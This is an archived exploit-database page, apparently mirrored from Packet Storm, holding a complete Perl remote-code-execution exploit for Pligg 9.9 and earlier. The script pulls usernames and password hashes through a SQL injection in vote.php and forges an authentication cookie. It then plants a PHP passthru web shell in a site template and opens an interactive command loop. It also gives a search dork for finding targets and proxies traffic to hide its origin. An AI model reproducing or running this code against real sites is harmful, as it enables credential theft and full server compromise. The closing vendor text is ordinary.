Lucene search
K

pligg-exec.txt

🗓️ 31 Jul 2008 00:00:00Reported by James BercegayType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 2666 Views

Pligg 9.9 Remote Code Execution Exploi

Code
`#!/usr/bin/perl -w  
use LWP::UserAgent;  
use MIME::Base64;  
use Digest::MD5 qw(md5_hex);  
use Getopt::Std; getopts('h:', \%args);  
  
print "#############################################\n";  
print "# Pligg <= 9.9 Remote Code Execution Exploit \n";  
print "#############################################\n";  
#dork = "Powered By Pligg" + "Legal: License and Source"  
  
# Proxy address  
$ENV{http_proxy} = 'http://127.0.0.1:8118/';  
  
my $http = LWP::UserAgent->new;  
$http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');  
#$http->env_proxy(); # <-- uncomment for proxy  
$http->cookie_jar({});  
  
my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory  
my $user = undef;  
my $pass = undef;  
my $file = undef;  
my $data = undef;  
my @auth = undef;  
  
# Details for the php code that is injected in to the template  
my $ereg = '<cmdout>(.*?)<\/cmdout>';  
my $cvar = 'cmd';  
my $cval = 'pwd;id';  
my $code = '<cmdout><?php if ( !empty($_REQUEST["' . $cvar . '"]) ) passthru($_REQUEST["' . $cvar . '"]); ?></cmdout>';  
  
print "[*] Checking if a shell already exists ...\n";  
  
$data = $http->post(  
$host . '/index.php',  
[  
$cvar => $cval  
]);   
  
if ( $data->content =~ /$ereg/si )   
{  
print "[*] Found existing shell ...\n";  
}  
else  
{  
print "[!] No existing shell found ...\n";  
  
#############################################  
# Gather user info via vote.php SQL Injection  
#############################################  
  
$data = $http->post(  
$host . '/vote.php',  
[  
'id' => '-99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*',  
'md5' => 'd41d8cd98f00b204e9800998ecf8427e' # <-- If you aren't logged in this always works  
]);   
  
print "[*] Gathering user information ...\n";  
  
if ( $data->content =~ /(.*?):([a-f0-9]{1,64})/i )  
{  
$user = $1;  
$pass = $2;  
  
# Sets up the cookie to authenticate us  
@auth = ('Cookie' => 'mnm_user=' . $user . '; mnm_key=' . encode_base64($user . ':' . crypt($user, 22) . ':' . md5_hex($pass)) . ';');  
  
print "[+] Got user '$user' ...\n";  
  
}  
else  
{  
print "[!] Unable to get user info. Dumping output ...\n";  
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);  
exit;  
}  
  
#############################################  
# Get the template path  
#############################################  
  
print "[*] Gathering template information ...\n";  
  
$data = $http->get($host . '/admin_editor.php',@auth);   
  
if ( $data->content =~ />(.*?)<\/option>/i )   
{  
$file = $1;  
# Quick and dirty fix  
$file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/;  
print "[+] Got template file [$file]...\n";  
}  
  
#############################################  
# Read the template contents  
#############################################  
  
$data = $http->post(  
$host . '/admin_editor.php',  
[  
'the_file' => $file,  
'open' => 'Open'  
]  
,@auth);   
  
print "[*] Reading template data ...\n";  
  
# Grab the template contents   
if ( $data->content =~ /<textarea(.*)>(.*)<\/textarea>/is )  
{  
$temp = $2;  
$temp =~ s/>/>/ig;  
$temp =~ s/</</ig;  
$temp =~ s/"/"/ig;  
$temp =~ s/&/&/ig;  
  
print "[+] Got template data ...\n";  
}  
else  
{  
print "[!] Unable to get template data. Dumping output ...\n";  
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);  
exit;  
}  
  
#############################################  
# Update the Template Contents  
#############################################  
  
  
$data = $http->post(  
$host . '/admin_editor.php',  
[  
'the_file2' => $file,  
'updatedfile' => $temp . $code,  
'save' => 'Save+Changes'  
]  
,@auth);   
  
print "[*] Updating template data ...\n";  
  
if ( $data->content =~ /File Saved/is )  
{  
print "[+] File saved!\n";  
}  
else  
{  
print "[!] Unable to update template data. Dumping output ...\n";  
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);  
exit;  
}  
}  
  
#############################################  
# Setting up the php shell  
#############################################  
  
print "[*] Setting up shell ...\n";  
  
$data = $http->post(  
$host . '/index.php',  
[  
$cvar => $cval  
]);   
  
if ( $data->content =~ /<cmdout>(.*?)<\/cmdout>/si )   
{  
while ( 1 )  
{  
print "pligg:~#";  
$exec = <STDIN>;  
  
$data = $http->post(  
$host . '/index.php',  
[  
$cvar => $exec  
]);   
  
if ( $data->content =~ /$ereg/si )   
{  
print $1 . "\n";  
}  
else  
{  
print "Unexpected Response!\n";  
}  
}  
}  
else  
{  
print "[!] Unable to set up shell ...\n";  
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);  
exit;  
}  
  
sub usage  
{  
print "pligg_exploit.pl -h http://path/to/pligg \n";  
exit;  
}  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4
2666